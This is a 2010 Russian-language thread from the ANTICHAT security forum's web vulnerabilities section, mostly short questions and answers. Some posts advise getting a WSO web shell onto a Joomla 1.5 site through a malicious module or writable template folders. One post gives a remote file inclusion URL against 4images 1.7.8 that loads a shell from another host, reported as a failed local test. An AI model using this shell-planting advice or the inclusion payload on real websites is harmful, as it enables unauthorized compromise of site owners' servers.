HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #261  
Старый 09.08.2010, 02:47
Platon
Познающий
Регистрация: 05.01.2009
Сообщений: 32
Провел на форуме:
146971

Репутация: 12
По умолчанию

mr.celt - спасибо! мега удобная тузла! раньше делал это в ручную, теперь проверка наличие плагинов - дело 2 минут, очень мне понравилась!

[Feldmarschall] - ок, ухожу в другой топик.
 
Ответить с цитированием

  #262  
Старый 15.08.2010, 18:53
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

Приветствую, уважаемые форумчане.

Извините за идиотский вопрос, но как залить шелл в joomla v.1.5, если нет ни JoomlaXplorer, ни меню редактирования языков, при заливке в папку с картинками (media), пишет, что не правильное изображение (пробовал и 123.php и 123.php.jpg и 123.png), плюс к этому глобальный админ отключен, у меня аккаунт админа...

Кстати пишет, что запись в папку с картинками разрешена, но какой-то зловредный скрипт этому мешает.

Помогите, оч надо, а то решил шелами заняться (для общего развития), а тут такая засада...
 
Ответить с цитированием

  #263  
Старый 17.08.2010, 01:51
Unknown
Guest
Сообщений: n/a
Провел на форуме:
6976

Репутация: 4
По умолчанию

Если папка modules вритабельна, ставим новый модуль.

Архив по ссылке.

Шелл : wso.

zalil.ru/upload/29460413

Вот чёрт, файл удалён. Завтра перезалью.

Посмотри права в templates. Не одним JoomlaXplorer'ом залитие обходится, смотри ещё модули.
 
Ответить с цитированием

  #264  
Старый 30.08.2010, 21:31
x.Mr.Bob.x
Новичок
Регистрация: 11.05.2010
Сообщений: 0
Провел на форуме:
8862

Репутация: 0
По умолчанию

А вот допустим сейчас вышла новая версия vBulletin 4.0 Publishing Suite что входит в неё?если я приобрету смогу ли я пользоватся первое время стабильной 3.8.6 а после перейти без проблем на 4?
 
Ответить с цитированием

  #265  
Старый 03.09.2010, 15:24
putty
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Есть сайты на osCommerce (версия 2003г), пытался вставить в индекс и футер что-либо, никакой реакции, на странице это не отражается почему-то. Очищение файла или нарушение целостности кода сразу отражается на странице. Почему так может быть?
 
Ответить с цитированием

  #266  
Старый 10.09.2010, 15:11
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423

Репутация: 32
По умолчанию

4images

Сегодня покопался на inj3ct0r.com и меня заинтересовал этот пост link

Решил потестить на локальной машине. Скачал CMSку (1.7.8) с официального сайта, развернул и настроил как в мане написано.

Попробовал заюзать описанную уязвимость так

http://4images.local/global.php?db_servertype=http://shell.local/wso.txt%00

4images.local и shell.local - локальные домены.

Кроме надписи "Security violation" ничего не увидел.

Кто-нибудь тестил у себя? После просмотра исходника сложилось впечатление, что глобальный инъект невозможен, но может че-то сам не доганяю.
 
Ответить с цитированием

  #267  
Старый 13.09.2010, 00:53
x.Mr.Bob.x
Новичок
Регистрация: 11.05.2010
Сообщений: 0
Провел на форуме:
8862

Репутация: 0
По умолчанию

Всем привет. На одном сайте захотел приобрести шаблон, но у меня появился вопрос снизу перед выбором шаблона написано Type: CSS Full Site Flash 8 или CSS Static Full Site или ещё что либо,что это означает,я знаю что Type это вид, но вот что после не знаю, если ли Flash шаблон, для установки как система управления,например приобрел,установил и через него управлять? Дальше, аот шаблон,когда я смотрю все на Английском, смогу ли я изменить без проблем это на другие слова? Заранее спасибо
 
Ответить с цитированием

  #268  
Старый 13.09.2010, 09:10
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423

Репутация: 32
По умолчанию

Цитата:
Сообщение от x.Mr.Bob.x  
x.Mr.Bob.x said:
Всем привет. На одном сайте захотел приобрести шаблон, но у меня появился вопрос снизу перед выбором шаблона написано Type: CSS Full Site Flash 8 или CSS Static Full Site или ещё что либо,что это означает,я знаю что Type это вид, но вот что после не знаю, если ли Flash шаблон, для установки как система управления,например приобрел,установил и через него управлять? Дальше, аот шаблон,когда я смотрю все на Английском, смогу ли я изменить без проблем это на другие слова? Заранее спасибо
Вообще вопрос не совсем по тематике...

Но рискну предположить, что где Flash-шаблон там настройки отображения зашиты в самом flash-файле или в xml-ки, а где CSS Static, то настройки не изменяемы либо в стандартном файле с расширением css. По-поводу языка - если ты покупаешь шаблон, то делай с ним что хошешь - разбирайся в исходниках.
 
Ответить с цитированием

  #269  
Старый 13.09.2010, 18:56
x.Mr.Bob.x
Новичок
Регистрация: 11.05.2010
Сообщений: 0
Провел на форуме:
8862

Репутация: 0
По умолчанию

а разбиратся тяжело?
 
Ответить с цитированием

  #270  
Старый 13.09.2010, 19:54
HIMIKAT
Участник форума
Регистрация: 12.01.2007
Сообщений: 117
Провел на форуме:
795261

Репутация: 28
По умолчанию

Цитата:
Сообщение от x.Mr.Bob.x  
x.Mr.Bob.x said:
а разбиратся тяжело?
Поставь пока бесплатный шаб, покрути там что по чем, если совсем в тягость будет. Обезопасишь себя от необдуманной траты средств.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Сценарии/CMF/СMS 316 08.06.2010 09:56
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ